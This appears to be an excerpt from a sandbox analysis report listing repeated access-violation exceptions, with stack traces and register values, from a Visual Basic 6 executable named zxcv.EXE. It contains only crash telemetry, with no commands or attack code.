__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b7 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6327 exception.address: 0x4018b7 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b8 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6328 exception.address: 0x4018b8 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18b9 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6329 exception.address: 0x4018b9 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18ba exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6330 exception.address: 0x4018ba registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18bb exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6331 exception.address: 0x4018bb registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18bc exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6332 exception.address: 0x4018bc registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18bd exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6333 exception.address: 0x4018bd registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18be exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6334 exception.address: 0x4018be registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18bf exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6335 exception.address: 0x4018bf registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c0 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6336 exception.address: 0x4018c0 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c1 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6337 exception.address: 0x4018c1 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c2 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6338 exception.address: 0x4018c2 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c3 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6339 exception.address: 0x4018c3 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c4 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6340 exception.address: 0x4018c4 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c5 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6341 exception.address: 0x4018c5 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: zxcv+0x18c6 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6342 exception.address: 0x4018c6 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec exception.symbol: zxcv+0x18c7 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6343 exception.address: 0x4018c7 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 exception.symbol: zxcv+0x18c8 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6344 exception.address: 0x4018c8 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 exception.symbol: zxcv+0x18c9 exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6345 exception.address: 0x4018c9 registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 exception.symbol: zxcv+0x18ca exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6346 exception.address: 0x4018ca registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 exception.symbol: zxcv+0x18cb exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6347 exception.address: 0x4018cb registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 exception.symbol: zxcv+0x18cc exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6348 exception.address: 0x4018cc registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
__exception__ Aug. 9, 2021, 9:26 a.m.	stacktrace: EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048 BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981 ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600 zxcv+0x23ae @ 0x4023ae RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00 exception.symbol: zxcv+0x18cd exception.instruction: add byte ptr [eax], al exception.module: zxcv.EXE exception.exception_code: 0xc0000005 exception.offset: 6349 exception.address: 0x4018cd registers.esp: 1637384 registers.edi: 1 registers.eax: 0 registers.ebp: 1637724 registers.edx: 1923237542 registers.ebx: 0 registers.esi: 0 registers.ecx: 0	1
